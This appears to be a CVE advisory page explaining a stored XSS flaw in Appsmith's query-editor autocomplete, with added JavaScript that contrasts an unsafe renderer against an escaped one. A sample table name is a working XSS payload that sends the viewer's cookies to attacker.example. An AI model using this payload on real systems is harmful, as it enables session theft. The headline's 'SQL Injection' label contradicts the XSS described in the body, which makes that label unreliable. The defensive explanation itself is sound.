SQL Injection Vulnerability in Appsmith's SQL Query Editor
CVE-2026-7299
6.3 MEDIUM
What is CVE-2026-7299?
The SQL query editor in Appsmith does not properly sanitize database object names (table and column names) before using them in its autocomplete suggestions. Because these names are read from the connected database and rendered into the editor UI, an authenticated user who controls a datasource's schema (for example, by connecting a database they own) can plant an object name that carries HTML or JavaScript, turning the autocomplete list into a stored (persistent) XSS sink. Any other workspace member who later opens the query editor against the compromised datasource renders the payload, so the attacker's script executes in that member's browser under their session. The root cause is a missing output-encoding step: data that looks like trusted metadata still has to be encoded for the context it is rendered into, and development tools that display database-supplied strings need the same context-aware escaping as any other web UI.
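To make the pattern concrete, the following added example (not Appsmith's code; the function names, the `ALLOWED_TAGS` list and the sample table names are all constructed for illustration) shows an autocomplete renderer that interpolates object names straight into markup, beside a version that encodes each name for the context it lands in. A crude regression check then flags any tag in the rendered output that the renderer itself did not produce.

```javascript
// Added illustration of the stored-XSS pattern described above; this is NOT
// Appsmith's code. Function names and the sample metadata are constructed.

// Constructed database metadata as an attacker-controlled datasource might
// report it. A table name is just a string to the database, so it can carry
// HTML/JS: PostgreSQL, for example, accepts quoted identifiers that contain
// '<', '>' and quote characters.
const SAMPLE_TABLES = [
  "users",
  "orders",
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

// Vulnerable pattern: object names are interpolated directly into markup
// that the editor later assigns to innerHTML. Any other workspace member who
// opens the query editor against this datasource renders the payload.
function renderSuggestionsUnsafe(tableNames) {
  return '<ul class="autocomplete">' +
    tableNames.map((name) => `<li data-name="${name}">${name}</li>`).join("") +
    "</ul>";
}

// Minimal HTML escaping sufficient for the two contexts used below: element
// text and a double-quoted attribute value. '&' is escaped first so that the
// entities produced by later replacements are not re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened pattern: every untrusted value is encoded for the context it is
// inserted into. The payload is shown verbatim in the suggestion list as
// inert text instead of being parsed as an element.
function renderSuggestionsSafe(tableNames) {
  return '<ul class="autocomplete">' +
    tableNames
      .map((name) => `<li data-name="${escapeHtml(name)}">${escapeHtml(name)}</li>`)
      .join("") +
    "</ul>";
}

// Crude regression check over rendered output: does any element appear that
// the renderer itself does not emit? Returns true when foreign tags are
// present, i.e. when a raw '<' from the input survived as a tag opener.
const ALLOWED_TAGS = new Set(["ul", "/ul", "li", "/li"]);
function containsForeignTags(html) {
  const tags = [...html.matchAll(/<\s*(\/?[a-zA-Z][a-zA-Z0-9-]*)/g)]
    .map((m) => m[1].toLowerCase());
  return tags.some((tag) => !ALLOWED_TAGS.has(tag));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe renderer leaks foreign tags:", containsForeignTags(renderSuggestionsUnsafe(SAMPLE_TABLES)));
  console.log("safe renderer leaks foreign tags:  ", containsForeignTags(renderSuggestionsSafe(SAMPLE_TABLES)));
}
```

In a real editor the preferable fix is to never build HTML strings from metadata at all: create the `<li>` elements with `document.createElement` and assign names through `textContent` and `setAttribute`, or let the UI framework's text rendering do the encoding. The escaping function above exists so the example runs without a DOM; the point it demonstrates is that schema metadata is attacker-influenced input and needs the same treatment as any other user-supplied string.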
Affected Version(s)
Appsmith >= 0, < 2.1 (all releases before 2.1)
